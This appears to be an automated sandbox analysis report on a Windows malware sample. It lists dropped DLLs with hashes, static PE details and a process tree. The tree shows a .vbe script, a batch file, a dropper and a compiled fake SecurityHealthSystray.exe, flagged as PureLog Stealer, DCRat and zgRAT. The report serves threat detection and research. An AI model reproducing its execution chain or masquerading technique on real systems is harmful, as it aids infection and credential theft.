                                                            SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                            SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                            SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\urpInPSH.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):41472
                                                            Entropy (8bit):5.6808219961645605
                                                            Encrypted:false
                                                            SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                            MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                            SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                            SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                            SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\wtcqJyWC.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):294912
                                                            Entropy (8bit):6.010605469502259
                                                            Encrypted:false
                                                            SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                            MD5:00574FB20124EAFD40DC945EC86CA59C
                                                            SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                            SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                            SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 11%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                            C:\Users\user\Desktop\xpPRZvtG.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):85504
                                                            Entropy (8bit):5.8769270258874755
                                                            Encrypted:false
                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                            C:\Users\user\Desktop\zmrZuvIB.log

                                                            Download File
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36352
                                                            Entropy (8bit):5.668291349855899
                                                            Encrypted:false
                                                            SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                            MD5:94DA5073CCC14DCF4766DF6781485937
                                                            SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                            SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                            SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 21%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1224
                                                            Entropy (8bit):4.435108676655666
                                                            Encrypted:false
                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                            Malicious:false
                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.9136468723342275
                                                            Encrypted:false
                                                            SSDEEP:48:6WJJGPtqM7Jt8Bs3FJsdcV4MKe27/+vqBHKOulajfqXSfbNtm:2PxPc+Vx9Mmvk0cjRzNt
                                                            MD5:35DCD480CE17A6CA1277441D78F9E65B
                                                            SHA1:E7122A3D57C44C0D67862A48077360A8E25B438A
                                                            SHA-256:28A6EC5C587AE0C7A8F72ABA61AB19BC8599E6D13B227D41BDCF27F0DFA9ADAC
                                                            SHA-512:DC9E0C28FFC4F5A00FF87AC99761D04EF61539B265607EBC85110AA4916F1A5CE9FC3A71E8D3653D14FD8923F16651F3395D9CF0E4AF5D464DE73A7F42772E68
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................n'... ...@....@.. ....................................@................................. '..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.6103462178019665
                                                            Encrypted:false
                                                            SSDEEP:12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
                                                            MD5:7F48CA448373AA5F29388ECD8774273A
                                                            SHA1:752382BEB77E9571198056440BC31E38794E742B
                                                            SHA-256:45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
                                                            SHA-512:4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
                                                            Malicious:false
                                                            Preview:..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):1.2817708917906911
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:DCobxod.exe
                                                            File size:36'950'717 bytes
                                                            MD5:bc4a8996f18f14f3c77fff13fd23b00d
                                                            SHA1:431779aa67e97a32824956d9f3c9122a8340486b
                                                            SHA256:58040788269169456e7831099188a99796227cac63cc28771496d9f97204b895
                                                            SHA512:1e7e873f4af45963ffd59973bd1d76fbe5bf3841414788ade05aab69f11aae66c5fa3da082a43183a094fb12f5f94e35190e01c9ac224888f557f659a453471c
                                                            SSDEEP:98304:yrdqTz4+mudOlbI9tp2159NiHZOGDjuXnU:0dqvYwO23mwY8
                                                            TLSH:F987F10A75E25F32C2615A304663163D52A0E7323A12FF0F3A4F2096B9577F59E762B3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                            File Icon

                                                            Icon Hash:1515d4d4442f2d2d

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007FF474C8ABCBh
                                                            jmp 00007FF474C8A4DDh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FF474C7D327h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FF474C8D96Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FF474C8A66Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FF474C89C29h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FF474C7D2A2h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FF474C8D429h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FF474C8A5E8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FF474C8D40Ch
                                                            int3
                                                            jmp 00007FF474C8EEA7h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                            PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                            RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                            RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                            RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                            RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                            RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                            RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                            RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                            RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                            RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                            RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                            RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                            RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                            RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                            RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                            RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                            RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                            RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                            RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                            RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                            RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                            RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                            RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                            RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                            RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                            RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                            Imports

                                                            DLLImport
                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            No network behavior found

                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:07:19:00
                                                            Start date:13/01/2025
                                                            Path:C:\Users\user\Desktop\DCobxod.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\DCobxod.exe"
                                                            Imagebase:0x410000
                                                            File size:36'950'717 bytes
                                                            MD5 hash:BC4A8996F18F14F3C77FFF13FD23B00D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2042681440.0000000006BC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2043620112.00000000074DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:07:19:02
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Browserhost\H1Tsc0Ilqr3tfV2ZqDRU0epu1xRlbvhuJExp.vbe"
                                                            Imagebase:0x3e0000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Browserhost\I0GR.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:07:19:04
                                                            Start date:13/01/2025
                                                            Path:C:\Browserhost\intoHostperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Browserhost/intoHostperf.exe"
                                                            Imagebase:0x120000
                                                            File size:36'628'992 bytes
                                                            MD5 hash:CADD0C3B32099635F889BA630C4697F4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2079779312.0000000000122000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2317163401.0000000012C53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Browserhost\intoHostperf.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:07:19:15
                                                            Start date:13/01/2025
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
